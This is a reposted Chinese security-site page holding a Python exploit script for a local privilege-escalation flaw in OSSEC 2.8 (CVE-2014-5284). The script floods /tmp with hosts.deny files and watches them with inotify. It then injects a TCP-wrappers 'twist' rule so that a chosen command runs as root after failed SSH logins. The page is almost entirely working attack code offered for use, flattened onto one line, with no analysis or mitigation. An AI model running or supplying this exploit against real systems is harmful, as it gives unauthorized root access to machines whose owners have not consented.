OSSEC 2.8-创建不安全的临时文件导致权限提升

admin 2022年1月10日08:43:03评论90 views字数 2574阅读8分34秒阅读模式
#!/usr/bin/python # Exploit Title: ossec 2.8 Insecure Temporary File Creation Vulnerability Privilege Escalation # Date: 14-11-14 # Exploit Author: skynet-13 # Vendor Homepage: Doar utilizatorii inregistrati pot vedea linkurile. [ Click aici pentru a te inregistra ]# Software Link: Doar utilizatorii inregistrati pot vedea linkurile. [ Click aici pentru a te inregistra ]# Version: OSSEC  - 2.8 # Tested on: Ubunutu x86_64 # CVE : 2014-5284   # Created from Research by # Jeff Petersen # Roka Security LLC # Doar utilizatorii inregistrati pot vedea linkurile. [ Click aici pentru a te inregistra ]# Original info at Doar utilizatorii inregistrati pot vedea linkurile. [ Click aici pentru a te inregistra ]  # Run this on target machine and follow instructions to execute command as root   from twisted.internet import inotify from twisted.python import filepath from twisted.internet import reactor import os import optparse import signal     class HostDenyExploiter(object):       def __init__(self, path_to_watch, cmd):         self.path = path_to_watch         self.notifier = inotify.INotify()         self.exploit = cmd       def create_files(self):         print "=============================================="         print "Creating /tmp/hosts.deny.300 through /tmp/hosts.deny.65536 ..."           for i in range(300, 65536):             filename = "/tmp/hosts.deny.%s" % i             f = open(filename, 'w')             f.write("")             f.close()       def watch_files(self):         print "=============================================="         print "Monitoring tmp for file change...."         print "ssh into the system a few times with an incorrect password"         print "Then wait for up to 10 mins"         print "=============================================="         self.notifier.startReading()         self.notifier.watch(filepath.FilePath(self.path), callbacks=[self.on_file_change])       def write_exploit_to_file(self, path):         print 'Writing exploit to this file'         f = open(str(path).split("'")[1], 'w')         f.write(' sshd : ALL : twist %s n' % self.exploit)         f.close()         print "=============================================="         print " ssh in again to execute the command"         print "=============================================="         print "               End Prog."         os.kill(os.getpid(), signal.SIGUSR1)       def on_file_change(self, watch, path, mask):         print 'File: ', str(path).split("'")[1], ' has just been modified'         self.notifier.stopReading()         self.write_exploit_to_file(path)     if __name__ == '__main__':     parser = optparse.OptionParser("usage of program n" + "-c Command to run as root in quotesn")     parser.add_option('-c', dest='cmd', type='string', help='Used to specify a command to run as root')     (options, args) = parser.parse_args()     cmd = options.cmd     if options.cmd is None:         print parser.usage         exit(0)     ex = HostDenyExploiter('/tmp', cmd)     ex.create_files()     ex.watch_files()     reactor.run()     exit(0)


via@Romanian Security Team

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                   OSSEC 2.8-创建不安全的临时文件导致权限提升http://cn-sec.com/archives/503291.html


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